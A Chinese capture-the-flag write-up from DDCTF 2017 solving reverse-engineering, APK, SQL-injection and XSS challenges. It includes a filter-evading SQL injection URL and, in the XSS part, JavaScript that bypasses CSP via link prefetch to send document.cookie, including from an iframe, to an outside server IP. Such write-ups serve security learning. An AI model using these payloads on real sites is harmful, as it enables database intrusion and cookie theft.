DDCTF

Aryb1n 5月 18, 2017

第一题[RE]

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
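/*
 * Decode the challenge's "./data" file and print the recovered string.
 *
 * Every byte is decoded as (byte - 2) ^ key. The key starts at
 * 8 ^ (first raw byte) and grows by one per byte. At most the first 55 bytes
 * are decoded, and the text is printed starting at index 1.
 *
 * Returns 0 on success, 1 when "./data" cannot be opened.
 */
int main() {
    int i = 0;
    int j = 0;
    /* Zero-filled so the buffer is always NUL-terminated when handed to printf. */
    char arr[100] = {0};
    FILE * foutput = fopen("./data", "rb");
    if (foutput == NULL) {
        /* Without this check a missing file would pass NULL to fread. */
        perror("./data");
        return 1;
    }
    /* Stop one byte short of the buffer: an oversized file must not overrun
     * arr, and the last slot stays 0 as the string terminator. */
    while (j < (int)sizeof(arr) - 1 && fread(&arr[j], sizeof(char), 1, foutput)) {
        ++j;
    }
    fclose(foutput);
    // (0000000100000CB0 - 0000000100000C90) >> 2 = 8
    int v2 = 8 ^ arr[0];
    /* Decode 55 bytes at most, and never more than were actually read. */
    for(i = 0; i < 55 && i < j; i++) {
        arr[i] -= 2;
        arr[i] ^= v2;
        v2++;
    }
    /* Index 0 only seeds the key; the readable text starts at index 1. */
    printf("%s\n", &arr[1]);
    return 0;
}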
// DDCTF-5943293119a845e9bbdbde5a369c1f50@didichuxing.com

第二题[apk]

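/**
 * Recovers the string that the challenge APK stores as two XOR-ed byte tables.
 *
 * <p>The tables {@code p} and {@code q} are combined byte by byte. The first
 * decoded byte is the offset of the hidden text inside the decoded buffer, and
 * the text runs from that offset up to the next zero byte.
 *
 * <p>Both tables ship inside the same binary, so this is obfuscation only:
 * anyone who can decompile the APK can replay the routine, as done here.
 */
public class d2 { 

  private static final byte[] p = { -40, -62, 107, 66, -126, 103, -56, 77, 122, -107, -24, -127, 72, -63, -98, 64, -24, -5, -49, -26, 79, -70, -26, -81, 120, 25, 111, -100, -23, -9, 122, -35, 66, -50, -116, 3, -72, 102, -45, -85, 0, 126, -34, 62, 83, -34, 48, -111, 61, -9, -51, 114, 20, 81, -126, -18, 27, -115, -76, -116, -48, -118, -10, -102, -106, 113, -104, 98, -109, 74, 48, 47, -100, -88, 121, 22, -63, -32, -20, -41, -27, -20, -118, 100, -76, 70, -49, -39, -27, -106, -13, -108, 115, -87, -1, -22, -53, 21, -100, 124, -95, -40, 62, -69, 29, 56, -53, 85, -48, 25, 37, -78, 11, -110, -24, -120, -82, 6, -94, -101 };
  private static final byte[] q = { -57, -90, 53, -71, -117, 98, 62, 98, 101, -96, 36, 110, 77, -83, -121, 2, -48, 94, -106, -56, -49, -80, -1, 83, 75, 66, -44, 74, 2, -36, -42, -103, 6, -115, -40, 69, -107, 7, -32, -55, 56, 29, -18, 92, 106, -70, 82, -12, 4, -61, -85, 19, 34, 51, -26, -34, 126, -75, -42, -22, -79, -77, -61, -84, -92, 65, -81, 87, -94, 10, 84, 70, -8, -63, 26, 126, -76, -104, -123, -71, -126, -62, -23, 11, -39, 70, 14, 59, -101, -39, -124, 91, -109, 102, -49, 21, 105, 0, 37, -128, -57, 117, 110, -115, -86, 56, 25, -46, -55, 7, -125, 109, 76, 104, -15, 82, -53, 18, -28, -24 };

  /**
   * Decodes the hidden string from {@code p} and {@code q}.
   *
   * @return the bytes between the stored offset and the next zero byte (or the
   *     end of the buffer when no zero byte follows), decoded as UTF-8
   * @throws IllegalStateException if the tables are empty or the stored offset
   *     points outside the decoded buffer
   */
  private static String i()
  {
    // Only the overlap of the two tables can be XOR-ed.
    int size = Math.min(p.length, q.length);
    if (size == 0) {
      throw new IllegalStateException("empty XOR tables");
    }
    byte[] decoded = new byte[size];
    for (int n = 0; n < size; n++) {
      decoded[n] = (byte) (p[n] ^ q[n]);
    }

    // Byte 0 is a signed offset; reject values that would index outside the buffer.
    int start = decoded[0];
    if (start < 0 || start >= size) {
      throw new IllegalStateException("offset out of range: " + start);
    }

    // Bounded scan for the terminator, so a table without a zero byte cannot run off the end.
    int end = start;
    while (end < size && decoded[end] != 0) {
      end++;
    }

    // Explicit charset: the result must not depend on the platform default.
    return new String(decoded, start, end - start, java.nio.charset.StandardCharsets.UTF_8);
  }

  /** Prints the decoded string to standard output. */
  public static void main(String args[]){ 
    System.out.println(i());
  }
}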

flag:
DDCTF-a3b8c0b9dbe94fa6bd0e8bfa95620751@didichuxing.com

第三题[RE]

不会做,好像是要脱壳

第四题[???]

传说中有钱人才能做的MAC题目

第五题[WEB,sqli]

过滤了空格 => 用 %0a 代替
过滤了逗号 => 用下面两种不带逗号的写法代替(可见黑名单式过滤挡不住注入,根本的修复是参数化查询)

- limit处 => limit 1 offset 4
- union处 => union select * from (select 1)a join (select 2)b...

都是师傅教的然后自己构造了一下

payload:
http://118.190.134.8/t1/news.php?id=7%0aunion%0aselect%0a*from%0a(select%0a1)a%0ajoin%0a(select%0a1)b%0ajoin%0a(select%0ai.4%0afrom%0a(select%0a*%0afrom%0a(select%0a1)e%0ajoin%0a(select%0a2)f%0ajoin%0a(select%0a3)g%0ajoin%0a(select%0a4)h%0aunion%0aselect%0a*%0afrom%0anews)i%0alimit%0a1%0aoffset%0a4)c%0ajoin%0a(select%0a1)d#

flag:
flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}

几个资料不错

http://www.vuln.cn/6105 (wooyun http://drops.wooyun.org/tips/7883)

第七题[WEB,xss]

第一次做出来xss题目
这一题对xss没有任何过滤
但CSP不允许内联js,所以要借助上传:先把脚本传上去,再用 script 标签引入

  1. 先用link来bypass这个CSP

    // <link rel="prefetch" href="//45.78.56.153:8886/"> <!--
    // Creates a <link rel="prefetch"> element from script and adds it to <head>,
    // which makes the browser request the href below.
    var n0t = document.createElement("link");
    n0t.setAttribute("rel", "prefetch");
    // The cookies are appended to the URL, so they leave the browser as the request path.
    // Only script-readable cookies are exposed: a cookie set with HttpOnly never shows up
    // in document.cookie.
    n0t.setAttribute("href", "http://45.78.56.153:8886/" + document.cookie);
    document.head.appendChild(n0t);
    // -->
    

    在vps上收到了地址,等下作为脚本

  2. 再次上传并且引入第一步里的脚本

    <script src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=11b2054f2a3f28e43371b9008d66634d"></script>
    

    获取tips
    /hit=c2V0Y29va2llKCJmbGFnIiwgImZsYWd7eHh4eHh4eHh4eHh4eHh4eH0iLCB0aW1lKCkrMzYwMDAwMDAsICIvdDIvZjFhZ18xc19oM3IzIik7
    base64解码一下,得到:

    setcookie("flag", "flag{xxxxxxxxxxxxxxxx}", time()+36000000, "/t2/f1ag_1s_h3r3");
    
  3. 想要获取/t2/f1ag_1s_h3r3下的flag

    // <link rel="prefetch" href="//45.78.56.153:8886/"> <!--
    // Looks up the element with id 'kk' and runs the handler once it has loaded.
    var kk = document.getElementById('kk');
    kk.onload = function () {
     // contentWindow is the framed document's window. Its document is reachable from
     // script only when the frame is same-origin with this page.
     var m = document.getElementById('kk').contentWindow;
     var n0t = document.createElement("link");
     n0t.setAttribute("rel", "prefetch");
     // Reads the cookies visible to the framed document. A cookie's Path attribute narrows
     // which URLs it is sent to, but it does not hide the cookie from same-origin script;
     // HttpOnly does keep it out of document.cookie.
     n0t.setAttribute("href", "http://45.78.56.153:8886/" + m.document.cookie);
     document.head.appendChild(n0t);
    }
    // -->
    

    vps上返回地址
    http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=b4bc243e8536536b0ff97e9d8acc7918

  4. 这次引入一个iframe,通过第三步中的脚本来把cookie发到vps上

    <script src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=b4bc243e8536536b0ff97e9d8acc7918"></script>
    <iframe src="http://114.215.24.14/t2/f1ag_1s_h3r3" id="kk">
    </iframe>
    

    获得flag
    flag{DDCTF-82b6ac5623b04c8f823d29fa73875c9c@didichuxing.com};